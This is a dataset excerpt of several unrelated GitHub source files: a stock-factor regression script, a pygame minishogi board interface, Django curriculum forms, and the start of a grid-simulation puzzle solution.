code=end\n\n","repo_name":"atalia/leetcode","sub_path":"543.diameter-of-binary-tree.py","file_name":"543.diameter-of-binary-tree.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"37512533421","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 10 22:11:36 2020\r\n\r\n@author: wudi\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport statsmodels.api as sm\r\nfrom Toolbox import DataStructuring \r\nfrom scipy import stats\r\nfrom datetime import datetime, timedelta\r\nDS=DataStructuring()\r\n\r\ntoday=datetime.today()-timedelta(days=1)\r\nrebalday=[str(today)[0:10]]\r\ndf=pd.read_csv(\"D:/SecR/HK_Data.csv\")\r\ndf=df.dropna()\r\ndf['Sector']=df['Sector'].astype(str)\r\ndf['MarketCap']=df['MarketCap'].apply(np.log)\r\ndf['PE']=1/df['PE']\r\ndf['Turnover']=1/df['Turnover']\r\ndffull=df.copy()\r\ndfcut=df['MarketCap'].quantile(0.3)\r\ndfcut=dffull.loc[dffull['MarketCap']>=dfcut,:].copy()\r\n\r\ndef HK_Analysis(df):\r\n    indu_dummy=pd.get_dummies(df['Sector'])\r\n    df=pd.concat([df,indu_dummy],axis=1)\r\n    df=df.reset_index(drop=True)\r\n    Xset=['MarketCap']\r\n    Xset.extend(indu_dummy.columns)\r\n    selectsigs=['ROE','SalesGrowth','PE','Turnover']\r\n    df.iloc[:,1:]=df.iloc[:,1:].astype(float)\r\n    for sig in selectsigs:\r\n        dfnona=df.loc[df[sig].isna()==False,:].copy()\r\n        dfnona=DS.Winsorize(dfnona,sig,0.02)\r\n        dfnona[sig]=dfnona[sig].astype(float)\r\n        dfnona[Xset]=dfnona[Xset].astype(float)\r\n        est=sm.OLS(dfnona[sig],dfnona[Xset]).fit()\r\n        dfnona['N_'+sig]=est.resid.values\r\n        df=pd.merge(df,dfnona[['Ticker','N_'+sig]],on='Ticker',how='left')\r\n    df=df[['Ticker', 'ROE', 'SalesGrowth', 'PE', 'Turnover', 'MarketCap', 'Sector','N_ROE', 'N_SalesGrowth', 'N_PE', 'N_Turnover']]\r\n    dfnew=df[['Ticker','N_ROE','N_SalesGrowth','N_PE','N_Turnover']].copy()\r\n    for sig in selectsigs:\r\n        dfnona=dfnew.loc[dfnew['N_'+sig].isna()==False,:].copy()\r\n        dfnona[sig+'_zscore']=stats.zscore(dfnona['N_'+sig])\r\n        dfnew=pd.merge(dfnew,dfnona[['Ticker',sig+'_zscore']],on='Ticker',how='left')\r\n    df=pd.merge(df,dfnew[['Ticker','ROE_zscore','SalesGrowth_zscore','PE_zscore','Turnover_zscore']],on='Ticker',how='left')\r\n    df=df.rename(columns={'ROE_zscore':'Quality_zscore'})\r\n    df=df.rename(columns={'SalesGrowth_zscore':'Growth_zscore'})\r\n    df=df.rename(columns={'PE_zscore':'Value_zscore'})\r\n    df=df.rename(columns={'Turnover_zscore':'Market_zscore'})\r\n    return(dfnew,df)\r\n\r\ntoday=datetime.today()\r\ntodayname=str(today.strftime(\"%Y-%m-%d\"))\r\ndfnew,df=HK_Analysis(dffull)\r\n#dfnew.to_csv(\"D:/CompanyData/CompanyDataFullUniverse_HK_\"+todayname+\".csv\",index=False)\r\ndf.to_csv(\"D:/CompanyData/GentableFullUniverse_HK_\"+todayname+\".csv\",index=False)\r\n\r\ndfnew,df=HK_Analysis(dfcut)\r\ndf.to_csv(\"D:/CompanyData/Gentable_HK_\"+todayname+\".csv\",index=False)","repo_name":"Steinrichwu/SecR","sub_path":"HK_Update.py","file_name":"HK_Update.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"24283909658","text":"import pygame\nimport time \nimport os\nfrom copy import copy, deepcopy\n\npygame.init()\n\n#Screen Dimensions and Offsets \nscreen_width=880\nscreen_height=550\nsquaresize = 90\nx_offset = 215\ny_offset = 50\n\n#Files to Read 
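# NB: the commented pair below points at the original author's absolute Linux paths; the active pair uses the repo-relative boards// and moves// directories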
\n#board_file=\"//home//ailab_server//fb_polygames//Polygames//MS_board.txt\"\n#moves_file=\"//home//ailab_server//fb_polygames//Polygames//moves_list.txt\"\n\nboard_file= \"boards//MS_board.txt\"\nmoves_file =\"moves//minishogi_moves.txt\"\n\n#Player Pieces to Load \nR = pygame.image.load(\".//res//minishogi_res//R.png\")\nK = pygame.image.load(\".//res//minishogi_res//K.png\")\nB = pygame.image.load(\".//res//minishogi_res//B.png\")\nP = pygame.image.load(\".//res//minishogi_res//P.png\")\nG = pygame.image.load(\".//res//minishogi_res//G.png\")\nS = pygame.image.load(\".//res//minishogi_res//S.png\")\nP_Pro = pygame.image.load(\".//res//minishogi_res//+P.png\")\nS_Pro = pygame.image.load(\".//res//minishogi_res//+S.png\")\nB_Pro = pygame.image.load(\".//res//minishogi_res//+B.png\")\nR_Pro = pygame.image.load(\".//res//minishogi_res//+R.png\")\nlegal_move_indicator = pygame.image.load(\".//res//minishogi_res//move_indicator.png\") #WHITE piece \nselection=pygame.image.load(\".//res//minishogi_res//selection.png\") #red border \n\n#Transformations to Images used\nEnemy_R = pygame.transform.rotate(R,180)\nEnemy_K = pygame.transform.rotate(K,180)\nEnemy_B = pygame.transform.rotate(B,180)\nEnemy_P = pygame.transform.rotate(P,180)\nEnemy_G = pygame.transform.rotate(G,180)\nEnemy_S = pygame.transform.rotate(S,180)\nEnemy_P_Pro = pygame.transform.rotate(P_Pro,180)\nEnemy_S_Pro = pygame.transform.rotate(S_Pro,180)\nEnemy_B_Pro = pygame.transform.rotate(B_Pro,180)\nEnemy_R_Pro = pygame.transform.rotate(R_Pro,180)\n\n#Colors to use \nbrown_square= (185,136,38)\nbrown_index = (156,108,10) #orangy \nblack = (0,0,0)\nwhite =(255,255,255)\nmenu_area_color=(42,51,64)\n\n#matrix to link moves to i,j position values \nposition_letter_grid_5=[\n['a1', 'b1', 'c1', 'd1', 'e1'],\n['a2', 'b2', 'c2', 'd2', 'e2'],\n['a3', 'b3', 'c3', 'd3', 'e3'],\n['a4', 'b4', 'c4', 'd4', 'e4'],\n['a5', 'b5', 'c5', 'd5', 'e5']\n]\n\n#used to draw text to screen\ndef draw_text(text, size, color, x,y): \n font = pygame.font.SysFont(pygame.font.get_default_font(),size)\n text_surface = font.render(text, True, color)\n text_rect = text_surface.get_rect() \n text_rect.center = (x,y)\n screen.blit(text_surface,text_rect)\n\ndef drawboard(): \n screen.fill(menu_area_color)\n n = 1\n l = 'A'\n #draws the backboard with indexes \n for x in range(1,6): \n for y in range(1,6): \n x1 = (squaresize * (x - 1))+x_offset-30\n y1 = (squaresize * (y - 1))+y_offset-30\n pygame.draw.rect(screen, brown_index, [x1,y1,squaresize+60, squaresize+60])\n if y==1:\n draw_text(str(l),50,black,x1+75,y1+17)\n l = chr(ord(l)+1)\n if x==1:\n draw_text(str(n),55,black,x1+15,y1+75)\n n +=1\n \n #Left Board\n for x in range (6): \n pygame.draw.rect(screen,black,[0,(squaresize*x)+5,squaresize,squaresize])\n pygame.draw.rect(screen,brown_square,[0,(squaresize*x)+3+5,squaresize-3,squaresize-3])\n\n #Right Board \n for x in range (6): \n pygame.draw.rect(screen,black,[790,(squaresize*x)+5,squaresize,squaresize])\n pygame.draw.rect(screen,brown_square,[793,(squaresize*x)+3+5,squaresize-3,squaresize-3])\n\n #draws the actual board \n for x in range(1, 6):\n for y in range(1, 6):\n if x!=5 and y!=5:\n pygame.draw.rect(screen, black, [(squaresize * (x - 1))+x_offset, (squaresize * (y - 1))+y_offset,\n squaresize, squaresize])\n \n pygame.draw.rect(screen, brown_square, [((squaresize * (x - 1))+3)+x_offset, ((squaresize * (y - 1))+3)+y_offset,\n squaresize-3, squaresize-3])\n else: \n pygame.draw.rect(screen, black, [(squaresize * (x - 1))+x_offset, (squaresize * (y - 
1))+y_offset,\n squaresize+3, squaresize+3])\n \n pygame.draw.rect(screen, brown_square, [(squaresize * (x - 1))+3+x_offset, (squaresize * (y - 1))+3+y_offset,\n squaresize-3, squaresize-3])\n\n# reads in a boardfile as a file and returns a 2 dimensional array of the board \ndef read_file(boardfile):\n\n #gets first line number to check what board we are reading \n with open(boardfile, 'r') as l:\n firstline = l.readline()\n \n if firstline == \"1\\n\": #MiniShogi \n numlist=123456789\n l=[]\n l2=[]\n r1=0 #holds row count \n c1=0 #holds col count \n cflag = 0 \n c=0 #holds temp col count \n with open(boardfile, 'r') as f:\n board_layout=f.read()\n for j in range(19, 121): #starting and ending values start at 3rd row and end at 7th row \n if(board_layout[j]!='\\n' and board_layout[j] not in str(numlist) and j%17 !=4 and board_layout[j]!=\"|\"):\n l2.append(board_layout[j]) \n c+=1\n elif(board_layout[j]=='\\n'): #when the end of line is reached we increment the row and append list l2 into main list l\n if c!=0:\n l.append(l2)\n l2=[]\n r1+=1\n if cflag == 0: #holds column count one time before resetting back to 0 \n cflag = 1 \n c1 = c\n c = 0\n else:\n c = 0\n \n #after getting board we get the list of pieces on left and right board \n f = open(boardfile,'r') \n lines = f.readlines() \n t=[] \n t.append(lines[7])\n t.append(lines[8])\n global left, right \n left = [] \n right = [] \n\n for j in range(len(t[0])): \n if(t[0][j] == \"(\"): \n left.append(t[0][j+1])\n \n for j in range(len(t[1])): \n if(t[1][j] == \"(\"): \n right.append(t[1][j+1])\n \n l= l[::-1]\n return l,r1,c1\n else: \n return 0,0,0\n\n\n#acually draws image onto the board \ndef drawPieces(layout_file):\n global position_list\n position_list=[]\n player_list=[] \n \n #player and enemy player count\n PP = 0\n EP = 0 \n for j in range(5):\n for i in range(10):\n #i/2 because when writing to file, its 5*10 so need to translate 10 indexes to 5 \n if layout_file[j][i]==' ' and i+1<=9: \n if layout_file[j][i+1] == 'K' :\n screen.blit(Enemy_K,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n #position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n if layout_file[j][i+1] == 'G' :\n screen.blit(Enemy_G,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n #position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n if layout_file[j][i+1] == 'S' :\n screen.blit(Enemy_S,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n #position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n if layout_file[j][i+1] == 'R' :\n screen.blit(Enemy_R,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n # position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n if layout_file[j][i+1] == 'P' :\n screen.blit(Enemy_P,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n #position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n if layout_file[j][i+1] == 'B' :\n screen.blit(Enemy_B,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n #position_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n\n\n #append our pieces to a list to keep track of where each piece is\n if layout_file[j][i+1] == 'k' :\n screen.blit(K,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('K') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n if layout_file[j][i+1] == 'g' :\n screen.blit(G,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('G') \n 
player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n if layout_file[j][i+1] == 's' :\n screen.blit(S,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('S') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n if layout_file[j][i+1] == 'r' :\n screen.blit(R,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('R') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n if layout_file[j][i+1] == 'p' :\n screen.blit(P,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('P') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n if layout_file[j][i+1] == 'b' :\n screen.blit(B,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('B') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = [] \n \n #Promoted Pieces\n elif layout_file[j][i]==\"+\" and i+1<=9: \n #Enemy Pro Pieces\n if layout_file[j][i+1] == 'S' :\n screen.blit(Enemy_S_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n if layout_file[j][i+1] == 'R' :\n screen.blit(Enemy_R_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n if layout_file[j][i+1] == 'P' :\n screen.blit(Enemy_P_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n if layout_file[j][i+1] == 'B' :\n screen.blit(Enemy_B_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n \n #Our Pro Pieces \n if layout_file[j][i+1] == 's' :\n screen.blit(S_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('+S') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = []\n\n if layout_file[j][i+1] == 'r' :\n screen.blit(R_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('+R') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = []\n \n if layout_file[j][i+1] == 'p' :\n screen.blit(P_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('+P') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = []\n\n if layout_file[j][i+1] == 'b' :\n screen.blit(B_Pro,((i/2)*squaresize+x_offset,j*squaresize+y_offset))\n player_list.append('+B') \n player_list.append(((i/2)*squaresize+x_offset, j*squaresize+y_offset))\n position_list.append(player_list)\n player_list = []\n \n #after drawing board we draw the posession board \n #left board \n n = 0 \n for l in left: \n if l =='K':\n screen.blit(Enemy_K,(0,(squaresize*n)+3+5))\n n+=1\n elif l == 'G':\n screen.blit(Enemy_G,(0,(squaresize*n)+3+5))\n n+=1\n elif l == 'R': \n screen.blit(Enemy_R,(0,(squaresize*n)+3+5))\n n+=1\n elif l == 'B': \n screen.blit(Enemy_B,(0,(squaresize*n)+3+5))\n n+=1\n elif l == 'P': \n screen.blit(Enemy_P,(0,(squaresize*n)+3+5))\n n+=1\n elif l == 'S': \n screen.blit(Enemy_S,(0,(squaresize*n)+3+5))\n n+=1\n \n \n #right board \n n = 0 \n for r in right: \n if r =='k':\n screen.blit(K,(793,(squaresize*n)+3+5))\n player_list.append('K1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n n+=1\n elif r == 'g':\n 
player_list.append('G1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n screen.blit(G,(793,(squaresize*n)+3+5))\n n+=1\n elif r == 'r': \n player_list.append('R1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n screen.blit(R,(793,(squaresize*n)+3+5))\n n+=1\n elif r == 'b': \n player_list.append('B1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n screen.blit(B,(793,(squaresize*n)+3+5))\n n+=1\n elif r == 'p': \n player_list.append('P1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n screen.blit(P,(793,(squaresize*n)+3+5))\n n+=1\n elif r == 's': \n player_list.append('S1') \n player_list.append((793,(squaresize*n)+3+5))\n position_list.append(player_list) \n player_list = []\n screen.blit(S,(793,(squaresize*n)+3+5))\n n+=1\n \n\ndef get_moves(): \n moves=[]\n with open (moves_file, 'r') as m:\n moves=m.read().split()\n\n return moves\n\ndef isPiecePresent(x,y):\n selection_coordinates = (0,0)\n position = \"T\"\n for i in range(len(position_list)):\n px,py = position_list[i][1]\n if (x>=px and x<=px+squaresize) and (y>=py and y<=py+squaresize):\n selection_coordinates=(px,py)\n position = position_list[i][0]\n break \n return selection_coordinates,position\n\ndef determine_position(position_x, position_y):\n x=''\n y=''\n n1 = 0 \n n2 = 1\n l = 'a'\n flag = 1\n while(flag == 1): #checks x coordinate \n if position_x >= n1*squaresize+x_offset and position_x<=n2*squaresize+x_offset: \n x = l; \n flag = 0\n else: \n n1+=1\n n2+=1\n l = chr(ord(l)+1)\n if (n2>5): \n break\n\n n1 = 0 \n n2 = 1\n l = 1\n flag = 1\n while(flag == 1): #checks y coordinate \n if position_y >= n1*squaresize+y_offset and position_y<=n2*squaresize+y_offset: \n y = l; \n flag = 0\n else: \n n1+=1\n n2+=1\n l +=1\n if (n2>5): \n break\n \n if x ==\"\" or y ==\"\": \n x = \"\"\n y = \"\" \n \n return x+str(y)\n\n\n#moves list translated physically into dots on board to indicate where the specified piece can move \ndef print_moves(letter_co, m_list):\n legal_moves=[] \n\n off_board = False \n #check if its on board or off board piece \n if len(letter_co) == 2 and letter_co[0]!=\"+\":\n off_board = True \n letter_co = letter_co[0]\n \n if len(letter_co) == 1: \n for moves in m_list:\n if letter_co == moves[0]: \n legal_moves.append(moves[1:])\n if letter_co == \"P\":\n if \"K\" not in moves and \"P\" not in moves and \"R\" not in moves and \"G\" not in moves and \"S\" not in moves and \"B\" not in moves:\n legal_moves.append(moves)\n else: \n for moves in m_list: \n if letter_co in moves: \n legal_moves.append(moves[2:])\n \n\n # 1 - move normal (e3) \n # 2 - eat (xa4) \n # 3 - moving piece to board (@a2) \n\n #HAVE NOT DONE YET \n # 4 - moving to promotion (b5+)\n # 5 - eating piece and promoting (xb5+)\n\n if not(off_board): #onboard piece so we put moves with case 1 and 2 \n for move in legal_moves:\n x = -1\n y = -1\n if len(move) == 2: #just a regular move (#1)\n for i in range(5): \n for j in range(5): \n if move == position_letter_grid_5[i][j]: #e3\n x = i \n y = j \n if x!=-1 and y!=-1:\n screen.blit(legal_move_indicator, (y*squaresize+x_offset,x*squaresize+y_offset))\n elif move[0] == 'x': #piece that is eating (#2)\n for i in range(5): \n for j in range(5): \n if move[1:]== position_letter_grid_5[i][j]: #xa4 to a4 \n x = i \n y = j \n if x!=-1 and y!= -1: \n 
screen.blit(legal_move_indicator, (y*squaresize+x_offset,x*squaresize+y_offset))\n else: # means its case #5 \n for i in range(5): \n for j in range(5): \n if move[1:3]== position_letter_grid_5[i][j]: #xb5+ to b5\n x = i \n y = j \n if x!=-1 and y!=-1:\n screen.blit(legal_move_indicator, (y*squaresize+x_offset,x*squaresize+y_offset))\n elif move[2]==\"+\":#case #4 regular promotion\n for i in range(5): \n for j in range(5): \n if move[:2]== position_letter_grid_5[i][j]: #b5+ to b5\n x = i \n y = j \n if x!=-1 and y!=-1:\n screen.blit(legal_move_indicator, (y*squaresize+x_offset,x*squaresize+y_offset))\n\n else: #offboard piece so case #3\n for move in legal_moves:\n x = -1\n y = -1\n if move[0]=='@':\n for i in range(5): \n for j in range(5): \n if move[1:] == position_letter_grid_5[i][j]: \n x = i \n y = j \n if x!=-1 and y!=-1:\n screen.blit(legal_move_indicator, (y*squaresize+x_offset,x*squaresize+y_offset))\n \n return legal_moves\n\n#pops up the piece if selected \ndef selected_piece_print(p,position): \n x,y = position \n new_position = (x,y-10)\n if p == \"K\" or p == \"K1\":\n screen.blit(K,new_position)\n elif p == \"R\" or p == \"R1\": \n screen.blit(R,new_position)\n elif p == \"B\" or p == \"B1\": \n screen.blit(B,new_position)\n elif p == \"S\" or p == \"S1\": \n screen.blit(S,new_position)\n elif p ==\"P\" or p == \"P1\": \n screen.blit(P,new_position)\n elif p == \"G\" or p == \"G1\":\n screen.blit(G,new_position)\n #promoted pieces \n elif p ==\"+R\":\n screen.blit(R_Pro,new_position)\n elif p ==\"+B\":\n screen.blit(B_Pro,new_position)\n elif p ==\"+S\":\n screen.blit(S_Pro,new_position)\n elif p ==\"+P\":\n screen.blit(P_Pro,new_position)\n\n\ndef update_board(layout,move): \n l = deepcopy(layout) \n piece = move[0].lower()\n if piece == \"+\": \n piece += move[1].lower()\n print(piece)\n\n if len(piece) == 2: #for promoted pieces we check both areas \n for j in range(5):\n for i in range(10):\n if l[j][i]== piece[0] and l[j][i+1]==piece[1]: \n l[j][i] = \" \"\n l[j][i+1] = \" \"\n flag = 0 \n for j in range(5):\n for i in range(10):\n if position_letter_grid_5[j][int(i/2)] in move: \n if flag == 0:\n l[j][i] = piece[0]\n l[j][i+1] = piece[1]\n flag = 1\n else: \n for j in range(5):\n for i in range(10):\n if l[j][i]== piece: \n l[j][i] = \" \"\n\n flag = 0 \n for j in range(5):\n for i in range(10):\n if position_letter_grid_5[j][int(i/2)] in move: \n if flag == 0:\n l[j][i+1] = piece\n flag = 1\n return l \n\n\ndef run(): \n global screen\n screen=pygame.display.set_mode((screen_width,screen_height))\n running = True \n selected = False\n selected_Piece = \"\"\n move_made = False \n while running: \n layout,r,c = read_file(board_file)\n while(not layout and not r and not c): \n layout,r,c = read_file(board_file)\n\n old_layout= deepcopy(layout) #keeps an initial copy for comparison later\n\n drawboard()\n drawPieces(layout)\n moves = get_moves() \n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n running=False\n if event.type==pygame.MOUSEBUTTONDOWN: \n x,y=pygame.mouse.get_pos()\n selection_xy, piece = isPiecePresent(x,y)\n position = determine_position(x,y)\n if selection_xy != (0,0): #its a piece \n selected_Piece = piece\n selected = True \n else: \n # 1.) the piece position is clicked on board\n # 2.) random position on board is clicked \n # 3.) 
random position off the board is clicked \n\n if position: #3\n if selected: #2\n if (len(selected_Piece) == 2 and selected_Piece[1] == \"1\"): #for moving off board pieces (P1)\n selected_Piece = selected_Piece[0]\n \n for p in moves: \n if position in p and \"@\" in p:\n move = p\n print(move)\n output_file=open(\"output.txt\", \"w\")\n output_file.write(move)\n output_file.close()\n new_layout = update_board(layout, move) \n #updates the board with new move made by us \n layout,r,c = read_file(board_file)\n while True: \n drawboard() \n drawPieces(new_layout)\n pygame.display.update()\n layout,r,c = read_file(board_file)\n if layout!= old_layout: #when the board gets updated with the move computer makes, it will break out \n break\n for i in range(5): \n for j in range(10): \n print(new_layout[i][j],end=\"\")\n print(\"\")\n \n break\n else:\n #special case p does not have the letter in the move so we just check for the position \n if selected_Piece == \"P\": \n for p in moves: \n if position in p and \"K\" not in p and \"R\" not in p and \"S\" not in p and \"B\" not in p and \"G\" not in p and \"P\" not in p:\n move = p\n print(move)\n print(position)\n output_file=open(\"output.txt\", \"w\")\n output_file.write(move)\n output_file.close()\n new_layout = update_board(layout, move) \n #updates the board with new move made by us \n layout,r,c = read_file(board_file)\n while True: \n drawboard() \n drawPieces(new_layout)\n pygame.display.update()\n layout,r,c = read_file(board_file)\n if layout!= old_layout: #when the board gets updated with the move computer makes, it will break out \n break\n for i in range(5): \n for j in range(10): \n print(new_layout[i][j],end=\"\")\n print(\"\")\n break \n else:\n for p in moves: \n if position in p and selected_Piece in p:\n move = p\n print(move)\n print(position)\n output_file=open(\"output.txt\", \"w\")\n output_file.write(move)\n output_file.close()\n new_layout = update_board(layout, move) \n #updates the board with new move made by us \n layout,r,c = read_file(board_file)\n while True: \n drawboard() \n drawPieces(new_layout)\n pygame.display.update()\n layout,r,c = read_file(board_file)\n if layout!= old_layout: #when the board gets updated with the move computer makes, it will break out \n break\n for i in range(5): \n for j in range(10): \n print(new_layout[i][j],end=\"\")\n print(\"\")\n break \n \n selected_Piece =\"\"\n selected = False \n\n if selected == True: \n #pops up the selected piece \n selected_piece_print(piece, selection_xy)\n legal_moves = print_moves(piece, moves)\n\n pygame.display.update()\n","repo_name":"Tylereck81/Polygame-","sub_path":"minishogi.py","file_name":"minishogi.py","file_ext":"py","file_size_in_byte":28575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12697364206","text":"from django import forms\nfrom django.forms import HiddenInput\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Div, Submit, HTML, Button, Row, Field\nfrom crispy_forms.bootstrap import AppendedText, PrependedText, FormActions\nfrom api_gateway.api import buscar_db\n\n\nclass UserRegisterForm(UserCreationForm):\n\n email = forms.EmailField()\n\n rol = forms.ChoiceField(\n choices=(\n ('1', \"Admin\"),\n ('2', \"Director de carrera\"),\n ('3', \"Docente\"),\n ('4', \"Evaluador\"),\n ('5', \"Especialista\")\n ),\n widget=forms.Select,\n 
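        # role codes are stored as strings; initial='1' (set below) makes Admin the default\n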
initial='1',\n required=True,\n help_text=\"Seleccione su rol\"\n )\n\n class Meta:\n model = User\n fields = ['rol', 'username', 'email', 'password1', 'password2']\n\n def save(self, commit=True):\n user = super(UserRegisterForm, self).save(commit=False)\n user.rol = self.cleaned_data[\"rol\"]\n if commit:\n user.save()\n return user\n\n\nclass keyForm(forms.Form):\n\n clave_multifactor = forms.CharField(help_text=\"Se ha enviado la clave multifactor a su email\", required=True, widget=forms.PasswordInput())\n\n helper = FormHelper()\n helper.form_method = 'POST'\n helper.form_class = 'form-horizontal'\n helper.layout = Layout(\n Field('clave_multifactor', css_class='input-xlarge'),\n FormActions(\n Submit('save_changes', 'Run', css_class=\"btn-primary\"),\n # Submit('cancel', 'Cancel'),\n )\n )\n\n def __init__(self, *args, **kwargs):\n super(keyForm, self).__init__(*args, **kwargs)\n\n\nclass planEstudioForm(forms.Form):\n nombrePlan = forms.CharField(label='Nombre', max_length=30)\n cargaHorariaTotal = forms.FloatField(label='Carga Horaria Total')\n resolucionConeau = forms.CharField(label='Resolucion de la CONEAU', max_length=30)\n resolucionMinEdu = forms.CharField(label='Resolucion del Min de Edu', max_length=30)\n resolucionRectoral = forms.CharField(label='Resolucion Rectoral', max_length=30)\n\nclass materiaForm(forms.Form):\n materia = forms.CharField(label='Nombre de la Materia', max_length=80)\n descriptor = forms.CharField(label='Descripcion de la Materia', max_length=80)\n\nclass curricularForm(forms.Form):\n contenido = forms.CharField(label='Nombre del Contenido Curricular', max_length=80)\n descriptor = forms.CharField(label='Descripcion del Contenido Curricular', max_length=80)\n\nclass competenciaForm(forms.Form):\n competencia = forms.CharField(label='Nombre de la Competencia', max_length=80)\n descriptor = forms.CharField(label='Descripcion de la Competencia', max_length=80)\n\nclass capacidadForm(forms.Form):\n capacidad = forms.CharField(label='Nombre de la Capacidad', max_length=80)\n descriptor = forms.CharField(label='Descripcion de la Capacidad', max_length=80)\n\nclass unidadForm(forms.Form):\n unidad = forms.CharField(label='Nombre de la Unidad', max_length=80)\n descriptor = forms.CharField(label='Descripcion de la Unidad', max_length=80)\n\nclass actaForm(forms.Form):\n acta = forms.CharField(label='Nombre del Acta', max_length=80)\n descriptor = forms.CharField(label='Descripcion del Acta', max_length=80)\n\n\nclass agregarMateriaForm(forms.Form):\n\n materia = forms.ChoiceField(choices=[], help_text=\"Seleccione la materia a sumar a la carrera\")\n\n helper = FormHelper()\n helper.form_method = 'POST'\n helper.form_class = 'form-horizontal'\n helper.layout = Layout(\n 'materia',\n\n FormActions(\n Submit('save_changes', 'Agregar Materia', css_class=\"btn-primary\"),\n # Submit('cancel', 'Cancel'),\n )\n )\n\n def __init__(self, *args, **kwargs):\n super(agregarMateriaForm, self).__init__(*args, **kwargs)\n\n df = buscar_db('materias')\n\n # self.fields['materia'].choices = df['nombre'].tolist()\n\n self.fields['materia'].choices = [(x, x) for x in df['nombre'].tolist()]","repo_name":"marianomatelo/ingsoftavanz","sub_path":"pg/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72393028712","text":"input = __import__('sys').stdin.readline\n\ndi = [(0, 1), (1, 0), (0, -1), (-1, 0)]\nr, c, t = map(int,input().split())\nboard = 
[list(map(int, input().split())) for _ in range(r)]\ncleaner = []\nfor i in range(r):\n    if board[i][0] == -1:\n        cleaner.append(i)\n\ndef confusion(board, r, c):\n    tmp = [[0] * c for _ in range(r)]\n\n    for i in range(r):\n        for j in range(c):\n            if board[i][j]>=5:\n                val = board[i][j] // 5\n                for dx, dy in di:\n                    nx, ny = i + dx, j + dy\n                    if 0<=nx<r and 0<=ny<c and board[nx][ny] != -1:\n                        tmp[nx][ny] += val\n                        tmp[i][j] -= val\n    for i in range(r):\n        for j in range(c):\n            board[i][j] += tmp[i][j]\n\ndef clean(board, r, c, cleaner):\n    x1, y1 = cleaner[0] - 1, 0\n    while x1 != cleaner[0] or y1 != 1:\n        if x1 - 1 >= 0 and y1 == 0:\n            board[x1][y1] = board[x1 - 1][y1]\n            x1 -= 1\n        elif x1 == 0 and y1 + 1 < c:\n            board[x1][y1] = board[x1][y1 + 1]\n            y1 += 1\n        elif y1 == c - 1 and x1 + 1 <= cleaner[0]:\n            board[x1][y1] = board[x1 + 1][y1]\n            x1 += 1\n        elif x1 == cleaner[0] and y1 - 2 >= 0:\n            board[x1][y1] = board[x1][y1 - 1]\n            y1 -= 1\n    board[x1][y1] = 0\n    x1, y1 = cleaner[1] + 1, 0\n    while x1 != cleaner[1] or y1 != 1:\n        if x1 + 1 < r and y1 == 0:\n            board[x1][y1] = board[x1 + 1][y1]\n            x1 += 1\n        elif x1 == r - 1 and y1 + 1 < c:\n            board[x1][y1] = board[x1][y1 + 1]\n            y1 += 1\n        elif y1 == c - 1 and x1 